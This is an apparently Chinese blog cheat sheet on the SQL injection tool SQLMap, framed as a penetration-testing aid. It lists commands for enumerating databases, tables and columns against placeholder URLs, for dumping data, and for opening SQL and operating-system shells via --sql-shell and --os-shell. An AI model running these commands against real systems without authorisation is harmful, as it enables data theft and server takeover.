关于SQLMap的使用

本文详细介绍SQLMap的基本及常用参数,包括显示Web容器、数据库版本信息,读取数据库、列出所有表及字段,以及如何执行SQL和系统命令。适用于渗透测试和数据库安全检查。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

**

一、SQLMap基本参数

**
1.如果存在注入点,将会显示Web容器、数据库版本信息。-u
2.读取整个数据库 -u “xxx” --dbs

3.查看当前应用程序所用数据库:sqlmap -u “http://XXXXXXX?id=1” --current-dbs

4、列出指定数据库的所有表:sqlmap -u “http://XXXXXXX?id=1” --tables -D “admin”

5、读取指定表中的字段名称:sqlmap -u “http://XXXXXXX?id=1” --columns -T “user” -D “admin”

6.–dump参数意为转存数据,-C参数指定字段名称,-T指定表名,-D指定数据库名称。如果有数据库关键字需要加上"[]",如[User]。

结果存储在 C:\Users\ww\AppData\Local\sqlmap\output\

二、SQLMap 常用参数

–batch 默认选择是
–random-agent 随机
–r 1.txt 请求包注入
–level 3 注入等级
–sql-shell --sql-query=“sql” 执行SQL命令
–os-shell 执行系统命令

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值